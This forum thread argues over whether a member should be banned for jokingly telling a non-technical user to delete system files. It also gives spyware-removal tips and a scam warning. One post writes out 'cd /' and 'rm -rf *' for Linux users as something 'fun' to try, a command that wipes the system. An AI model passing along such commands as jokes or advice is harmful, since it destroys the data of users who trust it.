Oh get over it. No harm done, nothing happened, and it wasn't done with malicious intent - sure, one should probably use some judgement when making jokes like this, on whether the receiving person is capable of identifying it as a joke... but since no harm was done, I don't see it being ban-worthy.

Btw, If you're on linux try:
cd /
rm -rf *

I'm not sure if it'll work, but if it does it should be fun.

Got a spy program and it seems to be fixed now. I did have to buy one, but the AVG freeware just was not doing it, and this way I get tech support (which, I obviously need... ).
I had quite a few problems, actually. This computer is not new and that is probably why the AVG did not catch it, probably had them here before installation.
So, thanks.

Did your computer tell you to buy it? If that's the case, lots of spyware will install on your computer, tell you that you are infected, and for some money they will give you the full version of the app and remove the spyware for you. What you don't realize, it's it's a scam, they just want your credit card info.

You shouldn't have had to buy anything. What did you buy?

Install MVP hosts file to prevent spyware from calling home.
Run ccleaner to delete temp files.
Install the newest version of AVG free.
Install all windows updates.
Install malwarebytes, update it.
Perform a full scan with malwarebytes.
During that scan, AVG will scan in the background also.
Then you install spybot, update it, and scan with it.
Then you install adaware, update it, and scan with it.
Hopefully your system will be clean then.
Then every patch Tuesday (2nd tuesday of every month) you install windows updates.

yes, I know three are plenty of scams.. actually did hit on one, though I did not give them my info.
I began with Mcafree, because my internet provider has a deal with them. I could not install it. I have not had the greatest experience with them anyway. Then went to spybot, a program I have used before on another computer and finally got everything deleted. I will look into that malwarebytes. I did use adaware on my old computer, but wound up having to delete it because it slowed everything down a bunch.

Bedub covered just about everything. I personally have avast, but avg should work fine as well as your main antivirus.

Of course not, because you agree with dave's politics.

I don't think that dave's politics has anything to do with whether he should be banned, and if anything it's you who hates dave because of his politics and therefore want him gone.

I have to agree there, folks. I believe he meant it as a joke. It was in poor taste, but Idon't think he intended harm. I am also not sure it meets any of the CC guidelines for a warning or ban. Perhaps it ought, particularly if it were anything but a joke? Still right now, it doesn't seem to do meet the guidelines.

If someone told you to jump off the Brooklyn Bridge, would you do it?

And since people want to flip out in public and keep quoting the joke, did Player share with everyone the apology I sent her?

If I asked someone how to fix my leg, admitting I knew nothing about legs, bridges or gravity, and someone told me to jump off the bridge and that would fix my leg... yeah, probably.

If that's the case, how do you manage to ever walk? How does one manage to turn on the computer or use the internet?

WINDOWS HAS A HUGE WARNING THAT TELLS YOU NOT TO DELETE ANYTHING IN YOUR SYSTEM FILES AND ASKS YOU REPEATEDLY IF YOU WANT TO CONTINUE

Yeah, okay, everyone pile in on me, don't doubt the source. No, don't do that! How do you know she's even telling the truth, or is she just playing like she did that and no harm was done for some kind of internet Munchausen attention? Instead, you attack me. After all, no harm was done, so you better get out the fucking pitchforks! She overrode her windows system files when Windows told her not to, because some person on the internet, with obviously joking language, told her to?

I apologized of my own free will, without it being demanded of me by the mods or anyone else.

Most people over the age of 2 know bridges are dangerous.
Many adults do not not know that computers need programs with "dll" or anything else. In fact, ironically kids are probably more aware than adults, especially older adults.

This is what saved me.

That said, the warning appears ALWAYS, so its about like those warnings you get with aspirin.. or very intense medication both saying "this could result in ...x, y, zy.. up to and including death".

When you don't really know the difference, its hard to know what matters.

pimpdave wrote:Yeah, okay, everyone pile in on me, don't doubt the source. No, don't do that! How do you know she's even telling the truth, or is she just playing like she did that and no harm was done for some kind of internet Munchausen attention?

First, I did not file a complaint. And, if you read back, as soon as you said it was a joke, I deleted my negative comment.

That said, for you to not acknowledge that you did do something wrong... is worrisome.

As I did say to you, I am intelligent and aware of a lot of things, but computers just are not one of them. Per the "Munchausen" bit... I believe I have stated over and over in many contexts (internet searches, not viewing youtube, etc, etc.) that I am not up to speed on computers.

I was pretty much going to let this lie, but the more you protest, the more I think this might warrant a CC rule change so no one else makes a similar mistake or "joke".

With the above in mind, there is no reason to combine this issue with political views. I don't care if its Phattscotty, or Pimpdave. Disagreeing on politics is one thing. Stepping "out of bounds" in political discussion is something else. This is yet again another topic. Only if it were worthy of censor would it matter and then only to admins as in "is this one strike or two"? I don't believe this actually crossed that line, though as I mentioned.. maybe the rule should change. (not sure, just maybe something to consider).

Let me add a small story that might clarify here.

My husband (from PA) was helping my brothers (in CA) with a small car issue. When they were thanking him, they said something like "gee you are good at this..". My husband just responded "ah, nah.. It's just like most guys.. you grow up working on cars.". No one was insulted. Both my brothers instantly cracked up laughing and basically told him, no they had grown up working on computers and gardening.

Posting a link to a porn site that doesn't get viewed by anyone by the moderator who discovers it would also be a case of "no harm done", yet the site wouldn't take that view in those cases. Never mind that if harm had been done, WE'D NOT KNOW ABOUT IT because she wouldn't be able to log in for some time and quite possibly may not realize that it was his directions that caused it.

I understand that pimpdave didn't mean any harm by it (and I do believe that is the case). It just seems to me that his intent is only minimally relevant in this situation.
